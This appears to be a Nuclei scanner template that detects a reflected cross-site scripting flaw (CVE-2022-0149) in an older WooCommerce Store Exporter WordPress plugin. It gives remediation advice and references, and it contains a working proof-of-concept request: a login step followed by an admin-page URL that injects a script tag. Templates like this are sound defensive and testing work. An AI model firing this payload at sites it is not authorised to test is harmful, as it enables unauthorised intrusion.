60 lines
2.1 KiB
YAML
60 lines
2.1 KiB
YAML
id: CVE-2022-0149
|
|
|
|
info:
|
|
name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
|
|
remediation: |
|
|
Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0149
|
|
- https://plugins.trac.wordpress.org/changeset/2654545/woocommerce-exporter
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-0149
|
|
cwe-id: CWE-79
|
|
epss-score: 0.001
|
|
epss-percentile: 0.41099
|
|
cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: visser
|
|
product: store_exporter_for_woocommerce
|
|
framework: wordpress
|
|
tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|
- |
|
|
GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220301c4c9b5835891d51fe306eb13c46d606c6e4ac39ec9e2b79294762577ebbd1022100a223364ac6bbd7ce9485151d0fa651da0e6ce6d859946d279453b37a2c7d23fd:922c64590222798bb761d5b6d8e72950 |